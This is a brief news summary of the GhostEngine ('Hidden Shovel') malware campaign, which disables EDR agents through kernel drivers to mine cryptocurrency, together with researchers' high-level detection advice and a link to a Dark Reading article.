The 'GhostEngine' malware is a novel EDR-killing malware that silently attacks kernel drivers to disable security defense systems, allowing it to evade detection. Referred to as 'Hidden Shovel,' this malware is part of an intrusion set known as 'REF4578' that deploys GhostEngine to shut down EDR. It establishes persistence, installs a backdoor, and runs a cryptominer
The attack aims to breach security barriers in corporate networks to mine cryptocurrency unnoticed. Attackers utilize drivers to terminate EDR agents, while researchers recommend detecting initial actions like suspicious PowerShell execution and unusual privileges to identify GhostEngine's presence. Specific detection rules include monitoring for PowerShell downloads, service control via Script Interpreter, and tampering with Windows Defender. ```https://www.darkreading.com/cyberattacks-data-breaches/novel-edr-killing-ghostengine-malware-stealth